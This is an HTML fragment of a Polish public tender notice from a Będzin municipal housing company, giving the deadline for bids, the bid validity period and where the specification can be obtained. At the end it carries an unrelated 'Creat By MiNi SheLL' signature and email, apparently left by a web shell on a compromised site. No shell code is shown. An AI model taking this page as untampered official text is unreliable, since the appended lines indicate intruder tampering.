<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.bedzin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Budynków Mieszkalnych Sp. z o.o., 42-500 Będzin, ul. Krakowska 16..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 09:45, miejsce: Miejski Zakład Budynków Mieszkalnych Sp. z o.o., 42-500 Będzin, ul. Krakowska 16 - Sekretariat I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com